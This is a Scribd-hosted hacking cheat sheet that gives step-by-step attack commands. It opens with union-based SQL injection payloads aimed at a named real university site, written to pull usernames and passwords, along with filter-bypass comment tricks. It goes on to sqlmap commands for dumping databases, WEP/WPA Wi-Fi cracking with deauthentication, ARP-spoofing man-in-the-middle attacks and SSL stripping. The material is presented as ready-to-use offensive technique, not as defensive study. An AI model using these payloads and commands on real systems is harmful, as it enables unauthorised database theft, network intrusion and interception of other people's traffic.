Scribd Logo
Upload

Welcome to Scribd!

  • SQL CMD

    Uploaded by

    Vivek Gautam
    78 views4 pages
    This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

    Original Description:

    sql cmd database

    Original Title

    sql cmd

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    78 views4 pages

    SQL CMD

    Uploaded by

    Vivek Gautam
    This document discusses various techniques for performing SQL injection and wireless hacking. It provides steps for using sqlmap to find databases, tables, columns and dump data from a vulnerable SQL site. It also outlines the process for cracking WEP security including using airmon-ng, airodump-ng, aireplay-ng and aircrack-ng. Commands are given for man-in-the-middle attacks using arpspoof and driftnet/urlsnarf, with additional steps provided for SSL stripping attacks.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 4

    union base sql-injection

    ~~~~~~~~~~~~~~~~~~~

    Functions
    database() || for finding the database name
    version() || for finding the version of the db
    user() || for finding the root user of the db
    group_concat() || for make the collection of the different things

    Step:1 find the parameter value || somthing=somthing

    Step:2 apply single quote '


    EX:www.site.com/products.php?id=15'

    Step:3 find number of columns


    id=15 order by 1-- || for union base sqli
    id=15'order by 1-- - || for string base sqli
    http://www.bzu.edu.pk/departmentindex.php?id=-48'order by 16-- -

    Step:4 now find vul column

    http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
    1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

    Step:5 Now find the tables

    http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
    1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from
    information_schema.table_constraints-- -
    Step 6: Now finding the columns

    http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
    1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from
    information_schema.columns where table_name='useraccounts'-- -

    Step 7:fetching Data

    uname,upassword
    0x3a=:

    http://www.bzu.edu.pk/departmentindex.php?id=-48'union select
    1,2,3,4,5,6,group_concat(uname,0x3a,upassword),8,9,10,11,12,13,14,15 from
    useraccounts-- -

    For mode security:


    add /*!union*/ select
    or
    add /*!union*/ select
    or
    add /*!12345union*/ select

    add where ever it works

    SQL Map

    Assuming shu.co.in/lol.php?id=50
    check if the site is vulernable or not
    Step 1: sqlmap.py -u s.in/lol.php?id=50 --dbs //to find the database
    assume database name is sh

    Step 2: sqlmap.py -u .co.in/lol.php?id=50 -D s --tables //to find the tables


    assume the table name is users

    Step 3: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to find the


    columns

    Step 4: sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump


    the data

    alternative

    sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

    or

    sqlmap.py -u .co.in/lol.php?id=50 -D sh --dump //to dump the data of a perticular


    database

    SQL Map for kali

    Assuming sh.co.in/lol.php?id=50
    check if the site is vulernable or not

    Step 1: sqlmap -u sh.co.in/lol.php?id=50 --dbs //to find the database


    assume database name is shubham_choudhary

    Step 2: sqlmap -u shu.co.in/lol.php?id=50 -D sh --tables //to find the tables


    assume the table name is users

    Step 3: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users --columns //to find the


    columns

    Step 4: sqlmap -u sh.co.in/lol.php?id=50 -D sh -T users -C id --dump //to dump the


    data

    alternative

    sqlmap -u shu.co.in/lol.php?id=50 --dump //to dump all databases

    or

    sqlmap -u sh.co.in/lol.php?id=50 -D shubham_choudhary --dump //to dump the data


    of a perticular database

    SQL Map for backtrack

    Assuming .co.in/lol.php?id=50
    check if the site is vulernable or not
    Step 1: python sqlmap.py -u .co.in/lol.php?id=50 --dbs //to find the database
    assume database name is sh

    Step 2: python sqlmap.py -u .co.in/lol.php?id=50 -D shu --tables //to find the


    tables
    assume the table name is users

    Step 3: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users --columns //to


    find the columns

    Step 4: python sqlmap.py -u .co.in/lol.php?id=50 -D sh -T users -C id --dump //to


    dump the data

    alternative

    python sqlmap.py -u .co.in/lol.php?id=50 --dump //to dump all databases

    or

    python sqlmap.py -u s.co.in/lol.php?id=50 -D sh --dump //to dump the data of a


    perticular database

    Wireless hacking

    WI-FI
    ~~~~
    ~what is wi-fi?
    ~what is guided medium?
    data base is transfer which is guided by wire.
    ~what is unguided meduim?
    data is transfered with unguided(air) meduim.

    ~Their are two type of security(WEP,WPA,WPA2,WPS)

    WEP
    ~~~
    wireless equivalent privacy

    airmon,airodump,aireplay,aircrack
    WEP-CRACKING
    ~~~~~~~~~~

    STEP:1->airmon-ng ||display the wireless cards


    STEP:2->airmon-ng start wlan0 ||For enable the monitor mode.
    STEP:3->airodump-ng mon0 || for scan the wi-fi
    STEP:4->airodump-ng -w abc -c 1 --bssid 00:25:5E:33:FB:7C mon0 ||this is used to
    select a particular wifi router.
    STEP:5->aireplay-ng --deauth 0 -a 00:25:5E:33:FB:7C mon0
    STEP:6->aireplay-ng -arpreplay -b 00:25:5E:33:FB:7C mon0
    STEP:7->aircrack-ng sh-01.cap

    WPA
    ~~~
    1-6 same
    STEP:7->aircrack-ng -w dc.txt shubham-01.cap
    if the error comes and then use
    --ignore-negative-one

    Command For mimt attack(man in middle attack)

    step 1 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)


    ex arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
    step 2 : arpspoof -i wlan0/eth0 -t (target 1 ip) (target 2 ip)
    ex arpspoof -i wlan0 -t 192.168.1.1 192.168.1.105

    Step 3 : urlsnarf
    ex urlsnarf -i wlan0
    ex urlsnarf //for lan(eth0 port)
    step 4 : driftnet
    ex driftnet -i wlan0
    ex driftnet // for lan(eth0 port)

    Command for mimt attack with ssl strip

    Step 1 : echo 1 > /proc/sys/net/ipv4/ip_forward


    Step 2 : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT
    --to-port 8080
    Step 3 : arpspoof -i <interface> -t <target IP> <gateway IP>
    Step 4 : arpspoof -i <interface> -t <gateway IP> <target IP>
    Step 5 : sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log
    Step 6 : tail -F /root/Desktop/sslstrip.log

    You might also like